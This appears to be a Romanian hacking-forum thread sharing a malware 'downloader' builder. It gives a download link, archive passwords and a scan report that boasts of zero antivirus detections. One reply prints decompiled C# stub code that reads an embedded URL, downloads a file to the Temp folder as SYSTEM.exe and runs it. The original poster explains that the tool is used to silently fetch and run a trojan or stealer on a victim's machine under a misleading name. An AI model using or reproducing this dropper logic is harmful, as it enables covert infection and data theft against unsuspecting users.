Jump to content

FuckYeah Downloader

Recommended Posts


download : http://bit.ly/V3ehII



Pass: 7RK1zZumI5zfc7

Password : DownloaderHum

Scan : NovirusThanks

Report date: 2012-09-17 15:37:52 (GMT 1)

File name: fuckyeah-downloader-exe

File size: 49152 bytes

MD5 hash: 87e03e308ea182044a3eb95f588f347d

SHA1 hash: 88fff92b82340b1cc32256c44b9d923a36bc2550

Detection rate: 0 on 14 (0%)

Status: CLEAN

Asquared 15:37:52

Avast 15:37:52 5.0

AVG 15:37:52

Avira 15:37:52

BitDefender 15:37:52

ClamAV 15:37:52 0.97.4

Comodo 15:37:52 1.0

DrWeb 15:37:52 5.0.2

Fprot 15:37:52 6.0

IkarusT3 15:37:52 T31001097

Panda 15:37:52

STOPZilla 15:37:52

TrendMicro 15:37:52

VBA32 15:37:52

Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org

sursa: http://level-23.biz/forum/showthread.php?8082-FuckYeah-Downloader

Edited by io.kent
Link to comment
Share on other sites

Cred ca e virus.Sau ceva asemanator:

private void Button1_Click(object sender, EventArgs e)


this.level23 = this.TextBox1.Text;

if (File.Exists("/windows.exe"))




File.Copy(Application.StartupPath + "/Mini.nano", Application.StartupPath + "/windows.exe");

File.AppendAllText(Application.StartupPath + "/windows.exe", "(RAMERA:_:HOT)" + this.level23);


private void Button2_Click(object sender, EventArgs e)

Si mai jos aveti cod din Mini.nano care de fapt este un exe si am impresia ca e stubul:

private void Form1_Load(object sender, EventArgs e)


string[] strArray = Strings.Split(File.ReadAllText(Application.StartupPath + "/windows.exe"), "(RAMERA:_:HOT)", -1, CompareMethod.Binary);

MyProject.Computer.Network.DownloadFile(strArray[1], Path.GetTempPath() + "/SYSTEM.exe");

Process.Start(Path.GetTempPath() + "/SYSTEM.exe");




Edited by ICEBREAKER101010
Link to comment
Share on other sites

Nu cred ca e virus,ca lam scanat.. lam luat de pe level, am pus sursa, acolo, acum o sa arunc o privire in el, profunda sa vad cei acolo cu private, mersi de informatie,

edit// analiza facuta.. nu e virus

widwos exe e arhiva creata pentru downloader

Mini.nano este stub.



Edited by io.kent
Link to comment
Share on other sites

Nu cred ca e virus,ca lam scanat.. lam luat de pe level, am pus sursa, acolo, acum o sa arunc o privire in el, profunda sa vad cei acolo cu private, mersi de informatie,

edit// analiza facuta.. nu e virus

widwos exe e arhiva creata pentru downloader

Mini.nano este stub.



Si system.exe?

Link to comment
Share on other sites

deci o explicatie complecta, acest downloader nu este sa descarci, programe, filme, sau mai stiu eu ce,, este sa descarci un server de trojan/stealer pus in web/ftp si cand victima executa serverul de downloader se descarca serverul de trojan/stealer

de pe pagina respectiva web si se executeaza de mod invizibil, in carpeta C:\Documents and Settings\Equipo\Configuración local\Temp iti zic in spaniola :) ca numi iese in romana:( 12 ani plecat si imi cer scuze de greseli..asa in cazul acesta cu numele System.exe, în dowloaders sunt utilizate de serverul care a generat o greutate de obicei, mai putin de un server, criptat nbindeado

edit// dupa cum vad nu sti ce inseamna un downloader de aceasta clasa, numele e schimbat le pune el, presupun ca sa nusi dea seama victima, aceste downloaduri nu descarca programe, sau eu mai stiu ce, cum am specificat mai sus.. sper sa ma explic destul de clar

Edited by io.kent
Link to comment
Share on other sites

deci o explicatie complecta, acest downloader nu este sa descarci, programe, filme, sau mai stiu eu ce,, este sa descarci un server de trojan/stealer pus in web/ftp si cand victima executa serverul de downloader se descarca serverul de trojan/stealer

de pe pagina respectiva web si se executeaza de mod invizibil, in carpeta C:\Documents and Settings\Equipo\Configuración local\Temp iti zic in spaniola :) ca numi iese in romana:( 12 ani plecat si imi cer scuze de greseli..asa in cazul acesta cu numele System.exe, în dowloaders sunt utilizate de serverul care a generat o greutate de obicei, mai putin de un server, criptat nbindeado

Acum s-a facut lumina.Pacat ca nu e downloader din ala de pe mai multe hosturi ca premium...

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Create New...